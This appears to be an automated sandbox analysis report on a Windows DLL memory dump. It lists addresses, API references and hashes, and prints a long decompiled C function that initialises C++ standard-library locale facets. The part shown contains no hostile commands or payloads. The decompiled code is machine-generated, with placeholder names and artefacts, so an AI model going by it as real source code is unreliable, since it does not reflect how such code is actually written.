0x6ddda39e
0x6ddda3a3
0x6ddda3a6
0x6ddda3ad
0x6ddda348
0x6ddda348
0x6ddda34b
0x6ddda34f
0x6ddda353
0x6ddda360
0x6ddda368
0x6ddda36a
0x00000000
0x6ddda36a
0x6ddda331
0x6ddda331
0x00000000
0x6ddda331
0x6ddda32f
0x6ddda2a2
0x6ddda2a2
0x6ddda2a5
0x6ddda2a9
0x6ddda2ad
0x6ddda2ba
0x6ddda2c2
0x6ddda2c4
0x00000000
0x6ddda2c4
0x6ddda28b
0x6ddda28b
0x00000000
0x6ddda28b
0x6ddda289
0x6ddda1fc
0x6ddda1fc
0x6ddda1ff
0x6ddda203
0x6ddda207
0x6ddda214
0x6ddda21c
0x6ddda21e
0x00000000
0x6ddda21e
0x6ddda1e5
0x6ddda1e5
0x00000000
0x6ddda1e5
0x6ddda1e3

APIs

__EH_prolog3.LIBCMT ref: 6DDDA1AC
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDA1B6
int.LIBCPMT ref: 6DDDA1CD

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDA207
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDA227
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDA245

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: c49dd26c8f153f2a466a0d926debd4355dcc42107189266c15c98fdf1c9ff6c8
Instruction ID: d20c4c3fcb32443f0da8f334c695ee292152dde405567de4e1a24862c68d328c
Opcode Fuzzy Hash: c49dd26c8f153f2a466a0d926debd4355dcc42107189266c15c98fdf1c9ff6c8
Instruction Fuzzy Hash: DA11E071848119CBCF01FBA0C840EBDB7B4AF54318F26400AF510AB290DF759A06CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF2CF, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF2CF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t237;
				signed int _t238;
				void* _t250;
				void* _t263;
				void* _t276;
				void* _t289;
				void* _t302;
				void* _t315;
				void* _t328;
				void* _t341;
				void* _t354;
				void* _t367;
				void* _t380;
				void* _t393;
				void* _t406;
				void* _t419;
				void* _t432;
				signed int _t625;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				signed int _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int _t689;
				signed int _t690;
				signed int _t691;
				signed int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t696;
				signed int _t697;
				signed int _t698;
				signed int _t699;
				signed int _t700;
				signed int _t701;
				signed int _t702;
				signed int _t703;
				signed int _t704;
				signed int _t705;
				signed int _t706;
				signed int _t707;
				signed int _t708;
				signed int _t709;
				void* _t726;

				_t674 = __edx;
				_t513 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t726 - 0x14, 0);
				_t693 =  *0x6de96dec; // 0x0
				 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
				 *(_t726 - 0x10) = _t693;
				_t237 = E6DDB161C(0x6de96d98);
				_t516 =  *((intOrPtr*)(_t726 + 8));
				_t238 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t237);
				_t676 = _t238;
				if(_t238 != 0) {
					L5:
					E6DDD66BA(_t726 - 0x14);
					return E6DDF0075(_t676);
				} else {
					if(_t693 == 0) {
						_push( *((intOrPtr*)(_t726 + 8)));
						_push(_t726 - 0x10);
						__eflags = E6DDE0F87(__ebx, _t516, __edx, _t676, _t693) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t726 - 0x20);
							E6DDF3D74(_t726 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t676, _t693, 0x14);
							E6DDD6653(_t726 - 0x14, 0);
							_t694 =  *0x6de96dbc; // 0x0
							 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
							 *(_t726 - 0x10) = _t694;
							_t250 = E6DDB161C(0x6de96d70);
							_t523 =  *((intOrPtr*)(_t726 + 8));
							_t677 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t250);
							__eflags = _t677;
							if(_t677 != 0) {
								L12:
								E6DDD66BA(_t726 - 0x14);
								return E6DDF0075(_t677);
							} else {
								__eflags = _t694;
								if(_t694 == 0) {
									_push( *((intOrPtr*)(_t726 + 8)));
									_push(_t726 - 0x10);
									__eflags = E6DDE0FEF(_t513, _t523, __edx, _t677, _t694) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t726 - 0x20);
										E6DDF3D74(_t726 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t513, _t677, _t694, 0x14);
										E6DDD6653(_t726 - 0x14, 0);
										_t695 =  *0x6de96df0; // 0x0
										 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
										 *(_t726 - 0x10) = _t695;
										_t263 = E6DDB161C(0x6de96d9c);
										_t530 =  *((intOrPtr*)(_t726 + 8));
										_t678 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t263);
										__eflags = _t678;
										if(_t678 != 0) {
											L19:
											E6DDD66BA(_t726 - 0x14);
											return E6DDF0075(_t678);
										} else {
											__eflags = _t695;
											if(_t695 == 0) {
												_push( *((intOrPtr*)(_t726 + 8)));
												_push(_t726 - 0x10);
												__eflags = E6DDE1057(_t513, _t530, __edx, _t678, _t695) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t726 - 0x20);
													E6DDF3D74(_t726 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t513, _t678, _t695, 0x14);
													E6DDD6653(_t726 - 0x14, 0);
													_t696 =  *0x6de96dc0; // 0x0
													 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
													 *(_t726 - 0x10) = _t696;
													_t276 = E6DDB161C(0x6de96d74);
													_t537 =  *((intOrPtr*)(_t726 + 8));
													_t679 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t276);
													__eflags = _t679;
													if(_t679 != 0) {
														L26:
														E6DDD66BA(_t726 - 0x14);
														return E6DDF0075(_t679);
													} else {
														__eflags = _t696;
														if(_t696 == 0) {
															_push( *((intOrPtr*)(_t726 + 8)));
															_push(_t726 - 0x10);
															__eflags = E6DDE10BF(_t513, _t537, _t674, _t679, _t696) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t726 - 0x20);
																E6DDF3D74(_t726 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t513, _t679, _t696, 0x14);
																E6DDD6653(_t726 - 0x14, 0);
																_t697 =  *0x6de96df8; // 0x0
																 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																 *(_t726 - 0x10) = _t697;
																_t289 = E6DDB161C(0x6de96da4);
																_t544 =  *((intOrPtr*)(_t726 + 8));
																_t680 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t289);
																__eflags = _t680;
																if(_t680 != 0) {
																	L33:
																	E6DDD66BA(_t726 - 0x14);
																	return E6DDF0075(_t680);
																} else {
																	__eflags = _t697;
																	if(_t697 == 0) {
																		_push( *((intOrPtr*)(_t726 + 8)));
																		_push(_t726 - 0x10);
																		__eflags = E6DDE1127(_t513, _t544, _t674, _t680, _t697) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t726 - 0x20);
																			E6DDF3D74(_t726 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t513, _t680, _t697, 0x14);
																			E6DDD6653(_t726 - 0x14, 0);
																			_t698 =  *0x6de96df4; // 0x0
																			 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																			 *(_t726 - 0x10) = _t698;
																			_t302 = E6DDB161C(0x6de96da0);
																			_t551 =  *((intOrPtr*)(_t726 + 8));
																			_t681 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t302);
																			__eflags = _t681;
																			if(_t681 != 0) {
																				L40:
																				E6DDD66BA(_t726 - 0x14);
																				return E6DDF0075(_t681);
																			} else {
																				__eflags = _t698;
																				if(_t698 == 0) {
																					_push( *((intOrPtr*)(_t726 + 8)));
																					_push(_t726 - 0x10);
																					__eflags = E6DDE11AB(_t513, _t551, _t674, _t681, _t698) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t726 - 0x20);
																						E6DDF3D74(_t726 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t513, _t681, _t698, 0x14);
																						E6DDD6653(_t726 - 0x14, 0);
																						_t699 =  *0x6de96dc8; // 0x0
																						 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																						 *(_t726 - 0x10) = _t699;
																						_t315 = E6DDB161C(0x6de96d7c);
																						_t558 =  *((intOrPtr*)(_t726 + 8));
																						_t682 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t315);
																						__eflags = _t682;
																						if(_t682 != 0) {
																							L47:
																							E6DDD66BA(_t726 - 0x14);
																							return E6DDF0075(_t682);
																						} else {
																							__eflags = _t699;
																							if(_t699 == 0) {
																								_push( *((intOrPtr*)(_t726 + 8)));
																								_push(_t726 - 0x10);
																								__eflags = E6DDE1230(_t513, _t558, _t674, _t682, _t699) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t726 - 0x20);
																									E6DDF3D74(_t726 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t513, _t682, _t699, 0x14);
																									E6DDD6653(_t726 - 0x14, 0);
																									_t700 =  *0x6de96dc4; // 0x0
																									 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																									 *(_t726 - 0x10) = _t700;
																									_t328 = E6DDB161C(0x6de96d78);
																									_t565 =  *((intOrPtr*)(_t726 + 8));
																									_t683 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t328);
																									__eflags = _t683;
																									if(_t683 != 0) {
																										L54:
																										E6DDD66BA(_t726 - 0x14);
																										return E6DDF0075(_t683);
																									} else {
																										__eflags = _t700;
																										if(_t700 == 0) {
																											_push( *((intOrPtr*)(_t726 + 8)));
																											_push(_t726 - 0x10);
																											__eflags = E6DDE12B4(_t513, _t565, _t674, _t683, _t700) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t726 - 0x20);
																												E6DDF3D74(_t726 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t513, _t683, _t700, 0x14);
																												E6DDD6653(_t726 - 0x14, 0);
																												_t701 =  *0x6de96dd8; // 0x0
																												 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																												 *(_t726 - 0x10) = _t701;
																												_t341 = E6DDB161C(0x6de96d84);
																												_t572 =  *((intOrPtr*)(_t726 + 8));
																												_t684 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t341);
																												__eflags = _t684;
																												if(_t684 != 0) {
																													L61:
																													E6DDD66BA(_t726 - 0x14);
																													return E6DDF0075(_t684);
																												} else {
																													__eflags = _t701;
																													if(_t701 == 0) {
																														_push( *((intOrPtr*)(_t726 + 8)));
																														_push(_t726 - 0x10);
																														__eflags = E6DDE1339(_t513, _t572, _t674, _t684, _t701) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t726 - 0x20);
																															E6DDF3D74(_t726 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t513, _t684, _t701, 0x14);
																															E6DDD6653(_t726 - 0x14, 0);
																															_t702 =  *0x6de96db0; // 0x0
																															 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																															 *(_t726 - 0x10) = _t702;
																															_t354 = E6DDB161C(0x6de96d64);
																															_t579 =  *((intOrPtr*)(_t726 + 8));
																															_t685 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t354);
																															__eflags = _t685;
																															if(_t685 != 0) {
																																L68:
																																E6DDD66BA(_t726 - 0x14);
																																return E6DDF0075(_t685);
																															} else {
																																__eflags = _t702;
																																if(_t702 == 0) {
																																	_push( *((intOrPtr*)(_t726 + 8)));
																																	_push(_t726 - 0x10);
																																	__eflags = E6DDE13A1(_t513, _t579, _t674, _t685, _t702) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t726 - 0x20);
																																		E6DDF3D74(_t726 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t513, _t685, _t702, 0x14);
																																		E6DDD6653(_t726 - 0x14, 0);
																																		_t703 =  *0x6de96ddc; // 0x0
																																		 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																		 *(_t726 - 0x10) = _t703;
																																		_t367 = E6DDB161C(0x6de96d88);
																																		_t586 =  *((intOrPtr*)(_t726 + 8));
																																		_t686 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t367);
																																		__eflags = _t686;
																																		if(_t686 != 0) {
																																			L75:
																																			E6DDD66BA(_t726 - 0x14);
																																			return E6DDF0075(_t686);
																																		} else {
																																			__eflags = _t703;
																																			if(_t703 == 0) {
																																				_push( *((intOrPtr*)(_t726 + 8)));
																																				_push(_t726 - 0x10);
																																				__eflags = E6DDE1409(_t513, _t586, _t674, _t686, _t703) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t726 - 0x20);
																																					E6DDF3D74(_t726 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t513, _t686, _t703, 0x14);
																																					E6DDD6653(_t726 - 0x14, 0);
																																					_t704 =  *0x6de96de0; // 0x0
																																					 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																					 *(_t726 - 0x10) = _t704;
																																					_t380 = E6DDB161C(0x6de96d8c);
																																					_t593 =  *((intOrPtr*)(_t726 + 8));
																																					_t687 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t380);
																																					__eflags = _t687;
																																					if(_t687 != 0) {
																																						L82:
																																						E6DDD66BA(_t726 - 0x14);
																																						return E6DDF0075(_t687);
																																					} else {
																																						__eflags = _t704;
																																						if(_t704 == 0) {
																																							_push( *((intOrPtr*)(_t726 + 8)));
																																							_push(_t726 - 0x10);
																																							__eflags = E6DDE1471(_t513, _t593, _t674, _t687, _t704) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t726 - 0x20);
																																								E6DDF3D74(_t726 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t513, _t687, _t704, 0x14);
																																								E6DDD6653(_t726 - 0x14, 0);
																																								_t705 =  *0x6de96dfc; // 0x0
																																								 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																								 *(_t726 - 0x10) = _t705;
																																								_t393 = E6DDB161C(0x6de96da8);
																																								_t600 =  *((intOrPtr*)(_t726 + 8));
																																								_t688 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t393);
																																								__eflags = _t688;
																																								if(_t688 != 0) {
																																									L89:
																																									E6DDD66BA(_t726 - 0x14);
																																									return E6DDF0075(_t688);
																																								} else {
																																									__eflags = _t705;
																																									if(_t705 == 0) {
																																										_push( *((intOrPtr*)(_t726 + 8)));
																																										_push(_t726 - 0x10);
																																										__eflags = E6DDE14EC(_t513, _t600, _t674, _t688, _t705) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t726 - 0x20);
																																											E6DDF3D74(_t726 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de383cf, _t513, _t688, _t705, 0x14);
																																											E6DDD6653(_t726 - 0x14, 0);
																																											_t706 =  *0x6de96dcc; // 0x0
																																											 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																											 *(_t726 - 0x10) = _t706;
																																											_t406 = E6DDB161C(0x6de96d80);
																																											_t607 =  *((intOrPtr*)(_t726 + 8));
																																											_t689 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t406);
																																											__eflags = _t689;
																																											if(_t689 != 0) {
																																												L96:
																																												E6DDD66BA(_t726 - 0x14);
																																												return E6DDF0075(_t689);
																																											} else {
																																												__eflags = _t706;
																																												if(_t706 == 0) {
																																													_push( *((intOrPtr*)(_t726 + 8)));
																																													_push(_t726 - 0x10);
																																													__eflags = E6DDE1558(_t513, _t607, _t674, _t689, _t706) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6DDB1438(_t726 - 0x20);
																																														E6DDF3D74(_t726 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de383cf, _t513, _t689, _t706, 0x14);
																																														E6DDD6653(_t726 - 0x14, 0);
																																														_t707 =  *0x6de96e00; // 0x0
																																														 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																														 *(_t726 - 0x10) = _t707;
																																														_t419 = E6DDB161C(0x6de96dac);
																																														_t614 =  *((intOrPtr*)(_t726 + 8));
																																														_t690 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t419);
																																														__eflags = _t690;
																																														if(_t690 != 0) {
																																															L103:
																																															E6DDD66BA(_t726 - 0x14);
																																															return E6DDF0075(_t690);
																																														} else {
																																															__eflags = _t707;
																																															if(_t707 == 0) {
																																																_push( *((intOrPtr*)(_t726 + 8)));
																																																_push(_t726 - 0x10);
																																																__eflags = E6DDE15C4(_t513, _t614, _t674, _t690, _t707) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6DDB1438(_t726 - 0x20);
																																																	E6DDF3D74(_t726 - 0x20, 0x6de93504);
																																																	asm("int3");
																																																	E6DDF00AC(0x6de383cf, _t513, _t690, _t707, 0x14);
																																																	E6DDD6653(_t726 - 0x14, 0);
																																																	_t708 =  *0x6de96dd0; // 0x0
																																																	 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																																	 *(_t726 - 0x10) = _t708;
																																																	_t432 = E6DDB161C(0x6de96d60);
																																																	_t621 =  *((intOrPtr*)(_t726 + 8));
																																																	_t691 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t432);
																																																	__eflags = _t691;
																																																	if(_t691 != 0) {
																																																		L110:
																																																		E6DDD66BA(_t726 - 0x14);
																																																		return E6DDF0075(_t691);
																																																	} else {
																																																		__eflags = _t708;
																																																		if(_t708 == 0) {
																																																			_push( *((intOrPtr*)(_t726 + 8)));
																																																			_push(_t726 - 0x10);
																																																			__eflags = E6DDE162A(_t513, _t621, _t674, _t691, _t708) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				_t625 = _t726 - 0x20;
																																																				E6DDB1438(_t625);
																																																				E6DDF3D74(_t726 - 0x20, 0x6de93504);
																																																				asm("int3");
																																																				E6DDF00AC(0x6de3851f, _t513, _t691, _t708, 4);
																																																				_t709 = _t625;
																																																				 *(_t726 - 0x10) = _t709;
																																																				 *((intOrPtr*)(_t709 + 4)) =  *((intOrPtr*)(_t726 + 0xc));
																																																				_push( *((intOrPtr*)(_t726 + 0x14)));
																																																				_t231 = _t726 - 4;
																																																				 *_t231 =  *(_t726 - 4) & 0x00000000;
																																																				__eflags =  *_t231;
																																																				 *_t709 = 0x6de3c0c4;
																																																				 *((char*)(_t709 + 0x28)) =  *((intOrPtr*)(_t726 + 0x10));
																																																				E6DDE542F(_t513, _t625, _t674, _t691, _t709,  *_t231);
																																																				return E6DDF0075(_t709,  *((intOrPtr*)(_t726 + 8)));
																																																			} else {
																																																				_t691 =  *(_t726 - 0x10);
																																																				 *(_t726 - 0x10) = _t691;
																																																				 *(_t726 - 4) = 1;
																																																				E6DDD6FD3(__eflags, _t691);
																																																				 *0x6de3a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t691 + 4))))();
																																																				 *0x6de96dd0 = _t691;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t691 = _t708;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t690 =  *(_t726 - 0x10);
																																																	 *(_t726 - 0x10) = _t690;
																																																	 *(_t726 - 4) = 1;
																																																	E6DDD6FD3(__eflags, _t690);
																																																	 *0x6de3a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t690 + 4))))();
																																																	 *0x6de96e00 = _t690;
																																																	goto L103;
																																																}
																																															} else {
																																																_t690 = _t707;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t689 =  *(_t726 - 0x10);
																																														 *(_t726 - 0x10) = _t689;
																																														 *(_t726 - 4) = 1;
																																														E6DDD6FD3(__eflags, _t689);
																																														 *0x6de3a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t689 + 4))))();
																																														 *0x6de96dcc = _t689;
																																														goto L96;
																																													}
																																												} else {
																																													_t689 = _t706;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t688 =  *(_t726 - 0x10);
																																											 *(_t726 - 0x10) = _t688;
																																											 *(_t726 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t688);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t688 + 4))))();
																																											 *0x6de96dfc = _t688;
																																											goto L89;
																																										}
																																									} else {
																																										_t688 = _t705;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t687 =  *(_t726 - 0x10);
																																								 *(_t726 - 0x10) = _t687;
																																								 *(_t726 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t687);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t687 + 4))))();
																																								 *0x6de96de0 = _t687;
																																								goto L82;
																																							}
																																						} else {
																																							_t687 = _t704;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t686 =  *(_t726 - 0x10);
																																					 *(_t726 - 0x10) = _t686;
																																					 *(_t726 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t686);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t686 + 4))))();
																																					 *0x6de96ddc = _t686;
																																					goto L75;
																																				}
																																			} else {
																																				_t686 = _t703;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t685 =  *(_t726 - 0x10);
																																		 *(_t726 - 0x10) = _t685;
																																		 *(_t726 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t685);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t685 + 4))))();
																																		 *0x6de96db0 = _t685;
																																		goto L68;
																																	}
																																} else {
																																	_t685 = _t702;
																																	goto L68;
																																}
																															}
																														} else {
																															_t684 =  *(_t726 - 0x10);
																															 *(_t726 - 0x10) = _t684;
																															 *(_t726 - 4) = 1;
																															E6DDD6FD3(__eflags, _t684);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t684 + 4))))();
																															 *0x6de96dd8 = _t684;
																															goto L61;
																														}
																													} else {
																														_t684 = _t701;
																														goto L61;
																													}
																												}
																											} else {
																												_t683 =  *(_t726 - 0x10);
																												 *(_t726 - 0x10) = _t683;
																												 *(_t726 - 4) = 1;
																												E6DDD6FD3(__eflags, _t683);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t683 + 4))))();
																												 *0x6de96dc4 = _t683;
																												goto L54;
																											}
																										} else {
																											_t683 = _t700;
																											goto L54;
																										}
																									}
																								} else {
																									_t682 =  *(_t726 - 0x10);
																									 *(_t726 - 0x10) = _t682;
																									 *(_t726 - 4) = 1;
																									E6DDD6FD3(__eflags, _t682);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t682 + 4))))();
																									 *0x6de96dc8 = _t682;
																									goto L47;
																								}
																							} else {
																								_t682 = _t699;
																								goto L47;
																							}
																						}
																					} else {
																						_t681 =  *(_t726 - 0x10);
																						 *(_t726 - 0x10) = _t681;
																						 *(_t726 - 4) = 1;
																						E6DDD6FD3(__eflags, _t681);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t681 + 4))))();
																						 *0x6de96df4 = _t681;
																						goto L40;
																					}
																				} else {
																					_t681 = _t698;
																					goto L40;
																				}
																			}
																		} else {
																			_t680 =  *(_t726 - 0x10);
																			 *(_t726 - 0x10) = _t680;
																			 *(_t726 - 4) = 1;
																			E6DDD6FD3(__eflags, _t680);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t680 + 4))))();
																			 *0x6de96df8 = _t680;
																			goto L33;
																		}
																	} else {
																		_t680 = _t697;
																		goto L33;
																	}
																}
															} else {
																_t679 =  *(_t726 - 0x10);
																 *(_t726 - 0x10) = _t679;
																 *(_t726 - 4) = 1;
																E6DDD6FD3(__eflags, _t679);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t679 + 4))))();
																 *0x6de96dc0 = _t679;
																goto L26;
															}
														} else {
															_t679 = _t696;
															goto L26;
														}
													}
												} else {
													_t678 =  *(_t726 - 0x10);
													 *(_t726 - 0x10) = _t678;
													 *(_t726 - 4) = 1;
													E6DDD6FD3(__eflags, _t678);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t678 + 4))))();
													 *0x6de96df0 = _t678;
													goto L19;
												}
											} else {
												_t678 = _t695;
												goto L19;
											}
										}
									} else {
										_t677 =  *(_t726 - 0x10);
										 *(_t726 - 0x10) = _t677;
										 *(_t726 - 4) = 1;
										E6DDD6FD3(__eflags, _t677);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t677 + 4))))();
										 *0x6de96dbc = _t677;
										goto L12;
									}
								} else {
									_t677 = _t694;
									goto L12;
								}
							}
						} else {
							_t676 =  *(_t726 - 0x10);
							 *(_t726 - 0x10) = _t676;
							 *(_t726 - 4) = 1;
							E6DDD6FD3(__eflags, _t676);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t676 + 4))))();
							 *0x6de96dec = _t676;
							goto L5;
						}
					} else {
						_t676 = _t693;
						goto L5;
					}
				}
			}

0x6dddf2cf
0x6dddf2cf
0x6dddf2d6
0x6dddf2e0
0x6dddf2e5
0x6dddf2f0
0x6dddf2f4
0x6dddf2f7
0x6dddf2fc
0x6dddf300
0x6dddf305
0x6dddf309
0x6dddf34e
0x6dddf351
0x6dddf35d
0x6dddf30b
0x6dddf30d
0x6dddf313
0x6dddf319
0x6dddf321
0x6dddf324
0x6dddf361
0x6dddf36f
0x6dddf374
0x6dddf37c
0x6dddf386
0x6dddf38b
0x6dddf396
0x6dddf39a
0x6dddf39d
0x6dddf3a2
0x6dddf3ab
0x6dddf3ad
0x6dddf3af
0x6dddf3f4
0x6dddf3f7
0x6dddf403
0x6dddf3b1
0x6dddf3b1
0x6dddf3b3
0x6dddf3b9
0x6dddf3bf
0x6dddf3c7
0x6dddf3ca
0x6dddf407
0x6dddf415
0x6dddf41a
0x6dddf422
0x6dddf42c
0x6dddf431
0x6dddf43c
0x6dddf440
0x6dddf443
0x6dddf448
0x6dddf451
0x6dddf453
0x6dddf455
0x6dddf49a
0x6dddf49d
0x6dddf4a9
0x6dddf457
0x6dddf457
0x6dddf459
0x6dddf45f
0x6dddf465
0x6dddf46d
0x6dddf470
0x6dddf4ad
0x6dddf4bb
0x6dddf4c0
0x6dddf4c8
0x6dddf4d2
0x6dddf4d7
0x6dddf4e2
0x6dddf4e6
0x6dddf4e9
0x6dddf4ee
0x6dddf4f7
0x6dddf4f9
0x6dddf4fb
0x6dddf540
0x6dddf543
0x6dddf54f
0x6dddf4fd
0x6dddf4fd
0x6dddf4ff
0x6dddf505
0x6dddf50b
0x6dddf513
0x6dddf516
0x6dddf553
0x6dddf561
0x6dddf566
0x6dddf56e
0x6dddf578
0x6dddf57d
0x6dddf588
0x6dddf58c
0x6dddf58f
0x6dddf594
0x6dddf59d
0x6dddf59f
0x6dddf5a1
0x6dddf5e6
0x6dddf5e9
0x6dddf5f5
0x6dddf5a3
0x6dddf5a3
0x6dddf5a5
0x6dddf5ab
0x6dddf5b1
0x6dddf5b9
0x6dddf5bc
0x6dddf5f9
0x6dddf607
0x6dddf60c
0x6dddf614
0x6dddf61e
0x6dddf623
0x6dddf62e
0x6dddf632
0x6dddf635
0x6dddf63a
0x6dddf643
0x6dddf645
0x6dddf647
0x6dddf68c
0x6dddf68f
0x6dddf69b
0x6dddf649
0x6dddf649
0x6dddf64b
0x6dddf651
0x6dddf657
0x6dddf65f
0x6dddf662
0x6dddf69f
0x6dddf6ad
0x6dddf6b2
0x6dddf6ba
0x6dddf6c4
0x6dddf6c9
0x6dddf6d4
0x6dddf6d8
0x6dddf6db
0x6dddf6e0
0x6dddf6e9
0x6dddf6eb
0x6dddf6ed
0x6dddf732
0x6dddf735
0x6dddf741
0x6dddf6ef
0x6dddf6ef
0x6dddf6f1
0x6dddf6f7
0x6dddf6fd
0x6dddf705
0x6dddf708
0x6dddf745
0x6dddf753
0x6dddf758
0x6dddf760
0x6dddf76a
0x6dddf76f
0x6dddf77a
0x6dddf77e
0x6dddf781
0x6dddf786
